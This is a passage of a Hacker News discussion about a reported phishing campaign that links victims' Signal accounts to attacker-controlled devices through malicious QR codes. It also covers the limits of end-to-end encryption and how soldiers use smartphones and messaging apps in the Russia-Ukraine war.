      We probably agree that this is infeasible for the vast majority of people.

      Luckily reproducible builds somewhat sidestep this in a more practical way.

    • By edgineer 2025-02-206:19

      I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

      With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

      [0] https://github.com/maqp/tfc

    • By aembleton 2025-02-209:11

      > "E2E encryption" really requires the client to be built and verified by the end user

      But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

      At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

    • By SheinhardtWigCo 2025-02-1922:071 reply

      It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

      Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

      tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

      • By parhamn 2025-02-1922:09

        > tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

        This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).

  • By untech 2025-02-1917:543 reply

    It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.

    • By forkerenok 2025-02-1919:261 reply

      The article says they phish people into linking adversarial devices to their Signal:

      > [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

      • By Austiiiiii 2025-02-1921:411 reply

        There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse:

        https://www.bleepingcomputer.com/news/security/signal-will-l...

        Would a malicious URL be able to activate this feature as part of the request?

        • By inor0gu 2025-02-1921:50

          Probably not; in any normal case a secondary device shouldn't have that kind of authority to dictate.

          It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).

    • By mmooss 2025-02-1918:523 reply

      Is this serious?

      It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform that they already know how to use without additional training.

      The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me; I would expect someone is working on securing them well enough that even Russian intelligence doesn't have an effective exploit.

      The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.

      • By hnlmorg 2025-02-1919:16

        I seem to recall uploaded selfies being a frequent source of problems. For example: https://www.rferl.org/a/trench-selfies-tracking-russia-milit...

      • By newsclues 2025-02-1919:033 reply

        Phones aren’t secure, but they are more secure than the standard radios most have access to.

        Encrypted milspec comms aren’t the standard in a massive war.

        It’s weird, but Discord, Signal, and some mapping apps on smartphones are how this war is being fought.

        • By int_19h 2025-02-2022:14

          > Encrypted milspec comms aren’t the standard in a massive war.

          It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.

          Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with a patchwork of ad hoc fixes originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.

          But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).

        • By datameta 2025-02-1923:26

          At the start of the invasion in Ukraine it was possible for a while to listen to unencrypted radio comms from Russian convoys, hosted online live.

        • By dmix 2025-02-1920:044 reply

          Russians apparently aren't allowed to bring phones to the front lines, but Ukrainians often still do, as they have the combat management app, which is critical to operations. I've always wondered if this is why there's far more published Ukrainian combat footage than Russian, beyond the donation incentive attached to videos when publishing them on YouTube/Telegram.

          • By merely-unlikely 2025-02-1922:42

            In the first weeks of the war you could see Russian armored columns clearly on Google Maps as heavy traffic (along with other military activity but the columns really stood out). https://www.theverge.com/2022/2/28/22954426/google-disables-...

          • By newsclues 2025-02-1920:33

            Where is the fighting, and who runs the cellular networks in that area?

            I’d want to run military communications on a network my side controls

          • By motorest 2025-02-1921:062 reply

            > I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian.

            I'm sure Russia's meat-wave tactics have more of a role. If you're sending your troops on suicide missions, including guys without weapons and even on crutches, you're not exactly keen on having them carry mobile phones to document the experience or even, heaven forbid, survive by surrendering.

            • By glowiefedposter 2025-02-2012:29

              [flagged]

            • By MaxPock 2025-02-2010:552 reply

              This meat-wave meme needs to die. Again, if Ukrainians are being beaten by guys on crutches, it says a lot about this NATO-armed and -trained force.

              • By motorest 2025-02-2016:36

                > This meatwave meme needs to die.

                Are you sure it's a meme, though? There is plenty of footage out there documenting meat-wave tactics in 4K. Have you been living under a rock?

                > Again ,if Ukrainians are being beaten by guy in crutches (...)

                What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine, and Ukraine started invading and occupying Russian territory. Is that your definition of being beaten?

              • By mikrotikker 2025-02-2011:53

                I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure

          • By gpderetta 2025-02-1920:43

            I think a large chunk of the footage is taken by GoPros or similar, not smartphones.

            And I think pretty much all published Ukrainian and Russian combat footage is vetted by the respective military (who would want to be court-martialed for Reddit karma?).

            They just take different approaches to what, when, and where to release the footage.

      • By XorNot 2025-02-205:362 reply

        A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.

        There's no particular need, IMO, to secure smartphones on the battlefield in any way beyond standard countermeasures - i.e. encrypt the storage, use a passcode unlock.

        • By codethief 2025-02-208:561 reply

          The Russian military would beg to differ, see the sibling's comment: https://news.ycombinator.com/item?id=43106162

          • By XorNot 2025-02-2010:47

            That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).

            Which is a process and procedure issue, more than a security issue on the phones themselves (except insofar as there's obviously a solid need for a battlefield-device OS that strips all that stuff out by default).

        • By mmooss 2025-02-2022:57

          Smartphones store data; radios (depending on the radio) do not. The Russian military likely has tools for bypassing typical security.

    • By andreygrehov 2025-02-1919:291 reply

      Soldiers are not allowed to carry a cell phone.

HackerNews